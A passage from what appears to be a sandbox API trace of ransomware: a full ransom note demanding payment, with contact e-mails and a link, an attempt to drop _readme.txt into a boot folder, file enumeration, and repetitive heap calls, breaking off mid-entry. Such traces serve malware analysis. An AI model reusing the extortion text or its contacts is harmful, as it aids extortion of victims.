encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.539] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.541] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*" (normalized: "c:\\boot\\sv-se\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.542] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.542] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.542] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.542] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.543] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: 